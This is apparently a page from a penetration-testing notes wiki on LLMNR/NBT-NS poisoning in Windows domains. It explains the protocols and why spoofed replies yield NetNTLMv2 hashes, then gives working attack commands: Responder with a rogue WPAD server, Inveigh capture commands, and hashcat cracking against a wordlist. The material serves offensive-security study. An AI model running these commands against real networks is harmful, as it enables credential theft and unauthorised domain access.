LLMNR Poisoning

  • A Man-in-the-Middle attack on Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) broadcasts

  • This attack may provide low-privileged or administrative level password hashes that can be cracked offline or even cleartext credentials.

  • LLMNR and NBT-NS are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails.

  • LLMNR is a protocol that allows both IPv4 and IPv6 hosts

  • If a machine attempts to resolve a host but DNS resolution fails, typically, the machine will try to ask all other machines on the local network for the correct host address via LLMNR. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. It uses port 5355 over UDP natively.

  • If LLMNR fails, the NBT-NS will be used. NBT-NS identifies systems on a local network by their NetBIOS name. NBT-NS utilizes port 137 over UDP.

  • You dont need to be local admin.

Issue

  • When LLMNR/NBT-NS are used for name resolution, ANY host on the network can reply.

  • So, we can an authoritative name resolution source in the broadcast domain by replying to LLMNRand NBT-NS as if we know the answer.

  • The victim will share their NetNTLM hash if the requested host requires authentication actions.

  • We can then take the hash and try to crack it offline or use it in SMB relay attack or use it in different protocol like LDAP on the same host.

  • LLMNR/NBNS spoofing combined with a lack of SMB signing can often lead to administrative access on hosts within a domain.

  • For linux, we will use Responder and for windows we will use Inveigh

Attack from Linux

 # /usr/share/responder/logs is the logs dir where it will store hashes etc
 sudo responder -I <interface>
 
 # When a device is set to "Auto-detect" proxy settings, it will try to find a 
 # WPAD server on the network. The -w flag in Responder starts a rogue WPAD server.
 # WPAD is a protocol that allows clients to automatically discover and configure proxy 
 # settings. When a device (e.g., a Windows machine) tries to detect a proxy server, it 
 # will send a WPAD request on the network. If Responder is running with the -w flag, it will 
 # respond to this request with a malicious wpad.dat file. This file contains instructions
 # telling the client to use the attacker’s proxy (the one running Responder) for all web traffic.

Note:

- NetNTLMv2 hashes are very useful once cracked, but cannot be used for techniques such as pass-the-hash.
- Pass-the-hash attack works on NTLMv1 protocol.
- NTLMv2 includes a challenge-response mechanism where the client and the server both use a nonce (random number) 
generated by the server as part of the authentication process.
- The NTLMv2 response is calculated using not only the password hash but also this nonce, making the hash effectively
 "tied" to a specific challenge.
- As a result, an NTLMv2 hash is not directly reusable across different authentication attempts like an NTLMv1 hash, 
because the challenge is unique each time.

Cracking NTLMv2 hashes using Hashcat:

 hashcat -m 5600 ntlmv2_hash /usr/share/wordlists/rockyou.txt

Attack from Windows

 Import-Module .\Inveigh.ps1
 # start capturing
 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
 # view unique captured hashes
 Invoke-Inveigh GET NTLMV2UNIQUE
 # see which usernames we have collected
 Invoke-Inveigh GET NTLMV2USERNAMES
PreviousBreaching the DomainNextPassword Spraying

Last updated